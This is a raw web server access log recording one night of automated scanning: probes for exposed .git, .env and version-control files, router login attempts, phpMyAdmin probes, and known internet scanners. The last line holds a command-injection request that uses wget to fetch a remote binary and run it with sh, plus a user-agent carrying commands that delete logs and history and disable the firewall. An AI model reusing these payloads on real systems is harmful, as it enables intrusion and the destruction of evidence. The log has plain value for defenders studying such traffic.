45.13.119.147 - - [05/Jan/2024:00:42:11 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
191.96.227.231 - - [05/Jan/2024:00:42:18 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.31.0"
47.88.101.3 - - [05/Jan/2024:00:44:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.86.63 - - [05/Jan/2024:00:44:12 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.251.15.21 - - [05/Jan/2024:00:44:13 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
45.13.119.147 - - [05/Jan/2024:00:45:01 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.13.119.147 - - [05/Jan/2024:00:45:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.32.151.188 - - [05/Jan/2024:00:46:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.151.188 - - [05/Jan/2024:00:46:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
152.32.151.188 - - [05/Jan/2024:00:46:13 +0100] "t3 12.1.2" 400 329 "-" "-"
175.41.159.251 - - [05/Jan/2024:00:47:41 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
175.41.159.251 - - [05/Jan/2024:00:51:19 +0100] "GET /info/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8"
45.13.119.147 - - [05/Jan/2024:00:51:43 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.95.147.251 - - [05/Jan/2024:00:52:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
54.145.153.165 - - [05/Jan/2024:00:54:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3050.89 Safari/537.32"
175.41.159.251 - - [05/Jan/2024:00:56:11 +0100] "GET /node_modules/.git/config HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6"
3.85.24.248 - - [05/Jan/2024:00:56:33 +0100] "GET /build/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 8.1.0; MI 5X Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36"
175.41.159.251 - - [05/Jan/2024:00:56:52 +0100] "GET /modules/.hg/hgrc HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
45.95.147.251 - - [05/Jan/2024:00:58:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
3.85.24.248 - - [05/Jan/2024:01:04:32 +0100] "GET /content/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Linux; Android 8.0.0; G8441) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 YaBrowser/19.1.3.198.00 Mobile Safari/537.36"
172.104.131.24 - - [05/Jan/2024:01:04:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.27 - - [05/Jan/2024:01:05:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
51.158.233.180 - - [05/Jan/2024:01:07:20 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
51.158.239.47 - - [05/Jan/2024:01:07:24 +0100] "GET /sitemapindex.xml HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
51.158.232.29 - - [05/Jan/2024:01:07:27 +0100] "GET /category-sitemap.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
78.153.140.221 - - [05/Jan/2024:01:07:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [05/Jan/2024:01:07:35 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
51.158.236.53 - - [05/Jan/2024:01:07:42 +0100] "GET /sitemap.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
175.41.159.251 - - [05/Jan/2024:01:08:02 +0100] "GET /core/.hg/hgrc HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J327T1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36"
51.158.244.102 - - [05/Jan/2024:01:08:04 +0100] "GET /sitemap1.xml HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
51.158.239.250 - - [05/Jan/2024:01:08:12 +0100] "GET /sitemap.xml.gz HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
51.158.242.91 - - [05/Jan/2024:01:08:15 +0100] "GET /sitemap_index/xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
51.158.239.45 - - [05/Jan/2024:01:08:20 +0100] "GET /sitemap-index.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
51.158.236.53 - - [05/Jan/2024:01:08:26 +0100] "GET /sitemap.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
51.158.237.120 - - [05/Jan/2024:01:08:28 +0100] "GET /sitemap/sitemap.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (iPad; CPU OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/117.0.5938.108 Mobile/15E148 Safari/604.1"
51.158.238.114 - - [05/Jan/2024:01:08:56 +0100] "GET /sitemap.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
175.41.159.251 - - [05/Jan/2024:01:09:02 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36"
35.203.210.134 - - [05/Jan/2024:01:09:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
51.158.235.157 - - [05/Jan/2024:01:09:56 +0100] "GET /sitemap/index.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/117.0.5938.108 Mobile/15E148 Safari/604.1"
51.158.240.175 - - [05/Jan/2024:01:10:46 +0100] "GET /tag-sitemap.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
13.229.95.148 - - [05/Jan/2024:01:11:44 +0100] "GET /js/.git/config HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19"
45.95.147.251 - - [05/Jan/2024:01:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.116.52.177 - - [05/Jan/2024:01:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
152.32.252.103 - - [05/Jan/2024:01:13:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.252.103 - - [05/Jan/2024:01:13:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
152.32.252.103 - - [05/Jan/2024:01:13:45 +0100] "t3 12.1.2" 400 329 "-" "-"
152.32.209.62 - - [05/Jan/2024:01:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/569.53 (KHTML, like Gecko) Chrome/52.0.2243 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1) AppleWebKit/560.36 (KHTML, like Gecko) Chrome/70.0.2125 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:47 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 7_1; Win64; x64) AppleWebKit/563.48 (KHTML, like Gecko) Chrome/97.0.743 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:47 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0_2) AppleWebKit/561.51 (KHTML, like Gecko) Chrome/97.0.1225 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:47 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:47 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.209.62 - - [05/Jan/2024:01:13:48 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
54.173.133.244 - - [05/Jan/2024:01:13:52 +0100] "GET /assets/.git/config HTTP/1.1" 404 323 "-" "SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
175.41.159.251 - - [05/Jan/2024:01:19:19 +0100] "GET /lib/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:55.0) Gecko/20100101 Firefox/55.0"
13.229.95.148 - - [05/Jan/2024:01:19:26 +0100] "GET /plugins/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; MATBJS; rv:11.0) like Gecko"
3.85.24.248 - - [05/Jan/2024:01:21:25 +0100] "GET /resources/.git/config HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23"
3.85.24.248 - - [05/Jan/2024:01:23:52 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7"
175.41.159.251 - - [05/Jan/2024:01:24:39 +0100] "GET /log/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240&Win32"
191.96.227.231 - - [05/Jan/2024:01:27:59 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.31.0"
13.229.95.148 - - [05/Jan/2024:01:29:10 +0100] "GET /plugins/.hg/hgrc HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.6 Safari/538.1"
45.13.119.147 - - [05/Jan/2024:01:29:52 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
78.153.140.221 - - [05/Jan/2024:01:30:19 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [05/Jan/2024:01:30:19 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
45.95.147.251 - - [05/Jan/2024:01:32:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
13.229.95.148 - - [05/Jan/2024:01:33:01 +0100] "GET /test/.git/config HTTP/1.1" 404 321 "-" "portalmmm/2.0 N410i(c20;TB)"
205.210.31.86 - - [05/Jan/2024:01:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
13.229.95.148 - - [05/Jan/2024:01:35:41 +0100] "GET /vendor/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
13.229.95.148 - - [05/Jan/2024:01:37:29 +0100] "GET /admin/.svn/entries HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre"
13.229.95.148 - - [05/Jan/2024:01:39:20 +0100] "GET /blogs/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 OPR/63.0.3368.35"
54.173.133.244 - - [05/Jan/2024:01:40:35 +0100] "GET /src/test/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
54.173.133.244 - - [05/Jan/2024:01:40:54 +0100] "GET /templates/.git/config HTTP/1.1" 404 326 "-" "SonyEricssonT100/R101"
3.85.24.248 - - [05/Jan/2024:01:45:27 +0100] "GET /database/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3887.7 Safari/537.36"
175.41.159.251 - - [05/Jan/2024:01:45:45 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
198.235.24.194 - - [05/Jan/2024:01:47:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
3.85.24.248 - - [05/Jan/2024:01:47:26 +0100] "GET /images/.git/config HTTP/1.1" 404 323 "-" "Adobe Application Manager 2.0"
45.13.119.147 - - [05/Jan/2024:01:48:40 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
54.175.182.99 - - [05/Jan/2024:01:49:02 +0100] "GET /assets/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
45.95.147.251 - - [05/Jan/2024:01:49:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
175.41.159.251 - - [05/Jan/2024:01:50:02 +0100] "GET /data/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6"
45.13.119.147 - - [05/Jan/2024:01:50:45 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.95.147.251 - - [05/Jan/2024:01:52:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
167.248.133.35 - - [05/Jan/2024:01:55:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.35 - - [05/Jan/2024:01:55:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.35 - - [05/Jan/2024:01:55:06 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.35 - - [05/Jan/2024:01:55:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
175.41.159.251 - - [05/Jan/2024:01:58:14 +0100] "GET /modules/.hg/hgrc HTTP/1.1" 404 321 "-" "SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
54.173.133.244 - - [05/Jan/2024:02:04:44 +0100] "GET /plugins/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5362a Safari/604.1"
45.95.147.251 - - [05/Jan/2024:02:09:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
221.140.57.181 - - [05/Jan/2024:02:11:08 +0100] "GET http://212.91.246.87:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
221.140.57.181 - - [05/Jan/2024:02:11:08 +0100] "GET http://212.91.246.87:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
162.216.149.7 - - [05/Jan/2024:02:11:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.240.205.34 - - [05/Jan/2024:02:11:58 +0100] "Gh0st\xad" 501 321 "-" "-"
102.129.232.53 - - [05/Jan/2024:02:17:03 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
54.173.133.244 - - [05/Jan/2024:02:23:52 +0100] "GET /plugins/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36"
54.175.182.99 - - [05/Jan/2024:02:27:23 +0100] "GET /components/.git/config HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
175.41.159.251 - - [05/Jan/2024:02:27:49 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
3.85.24.248 - - [05/Jan/2024:02:31:23 +0100] "GET /lib/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
13.229.95.148 - - [05/Jan/2024:02:33:55 +0100] "GET /modules/.git/config HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3312.0 Safari/537.36"
54.175.182.99 - - [05/Jan/2024:02:36:20 +0100] "GET /node_modules/.git/config HTTP/1.1" 404 329 "-" "msnbot/1.1 ( http://search.msn.com/msnbot.htm)"
31.220.0.86 - - [05/Jan/2024:02:37:13 +0100] "GET /.git/config HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
64.62.197.76 - - [05/Jan/2024:02:39:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
64.62.197.214 - - [05/Jan/2024:02:40:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
64.62.197.70 - - [05/Jan/2024:02:41:16 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.226 - - [05/Jan/2024:02:41:44 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
64.62.197.73 - - [05/Jan/2024:02:41:51 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
64.62.197.218 - - [05/Jan/2024:02:42:27 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
3.85.24.248 - - [05/Jan/2024:02:43:27 +0100] "GET /downloads/.git/config HTTP/1.1" 404 326 "-" "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41"
175.41.159.251 - - [05/Jan/2024:02:46:13 +0100] "GET /modules/.svn/entries HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
13.229.95.148 - - [05/Jan/2024:02:47:32 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 8.0.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36"
175.41.159.251 - - [05/Jan/2024:02:47:55 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
3.85.24.248 - - [05/Jan/2024:02:50:01 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 OPR/48.1.2331.132804"
3.85.24.248 - - [05/Jan/2024:02:51:34 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1"
175.41.159.251 - - [05/Jan/2024:02:52:44 +0100] "GET /js/.git/config HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3676.400 QQBrowser/10.4.3469.400"
175.41.159.251 - - [05/Jan/2024:02:53:09 +0100] "GET /api/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
64.226.92.167 - - [05/Jan/2024:02:53:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.155.88.231 - - [05/Jan/2024:02:56:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.179 - - [05/Jan/2024:02:56:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
13.229.95.148 - - [05/Jan/2024:02:57:55 +0100] "GET /includes/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 9; Pixel 2 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
54.173.133.244 - - [05/Jan/2024:03:00:01 +0100] "GET /data/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (iPad; CPU OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1"
54.173.133.244 - - [05/Jan/2024:03:03:34 +0100] "GET /src/docs/.git/config HTTP/1.1" 404 325 "-" "Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1"
13.229.95.148 - - [05/Jan/2024:03:03:56 +0100] "GET /test/.hg/hgrc HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
103.116.52.127 - - [05/Jan/2024:03:04:16 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
